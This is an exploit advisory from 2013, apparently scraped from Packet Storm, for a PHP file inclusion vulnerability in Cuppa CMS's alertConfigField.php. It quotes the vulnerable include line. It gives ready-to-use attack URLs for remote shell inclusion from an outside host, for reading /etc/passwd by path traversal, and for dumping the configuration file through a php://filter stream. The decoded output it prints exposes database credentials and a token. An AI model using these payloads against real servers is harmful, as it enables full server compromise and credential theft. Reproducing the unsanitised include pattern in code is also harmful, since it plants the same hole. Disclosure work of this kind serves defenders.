Cuppa CMS Remote / Local File Inclusion

🗓️ 04 Jun 2013 00:00:00Reported by CWH UndergroundType
packetstorm🔗 packetstormsecurity.com👁 65 Views
Cuppa CMS PHP Code Injection allows inclusion of local or remote PHP files, leading to potential server compromis
`# Exploit Title : Cuppa CMS File Inclusion  
# Date : 4 June 2013  
# Exploit Author : CWH Underground  
# Site : www.2600.in.th  
# Vendor Homepage : http://www.cuppacms.com/  
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip  
# Version : Beta  
# Tested on : Window and Linux  
  
,--^----------,--------,-----,-------^--,  
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
`+---------------------------^----------|  
`\_,-------, _________________________|  
/ XXXXXX /`| /  
/ XXXXXX / `\ /  
/ XXXXXX /\______(  
/ XXXXXX /   
/ XXXXXX /  
(________(   
`------'  
  
####################################  
VULNERABILITY: PHP CODE INJECTION  
####################################  
  
/alerts/alertConfigField.php (LINE: 22)  
  
-----------------------------------------------------------------------------  
LINE 22:   
<?php include($_REQUEST["urlConfig"]); ?>  
-----------------------------------------------------------------------------  
  
  
#####################################################  
DESCRIPTION  
#####################################################  
  
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.  
  
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]  
  
#####################################################  
EXPLOIT  
#####################################################  
  
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?  
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd  
  
Moreover, We could access Configuration.php source code via PHPStream   
  
For Example:  
-----------------------------------------------------------------------------  
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php  
-----------------------------------------------------------------------------  
  
Base64 Encode Output:  
-----------------------------------------------------------------------------  
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+  
-----------------------------------------------------------------------------  
  
Base64 Decode Output:  
-----------------------------------------------------------------------------  
<?php   
class Configuration{  
public $host = "localhost";  
public $db = "cuppa";  
public $user = "root";  
public $password = "Db@dmin";  
public $table_prefix = "cu_";  
public $administrator_template = "default";  
public $list_limit = 25;  
public $token = "OBqIPqlFWf3X";  
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";  
public $upload_default_path = "media/uploadsFiles";  
public $maximum_file_size = "5242880";  
public $secure_login = 0;  
public $secure_login_value = "";  
public $secure_login_redirect = "";  
}   
?>  
-----------------------------------------------------------------------------  
  
Able to read sensitive information via File Inclusion (PHP Stream)  
  
################################################################################################################  
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2   
################################################################################################################  
`
04 Jun 2013 00:00Current
7.4High risk
Vulners AI Score7.4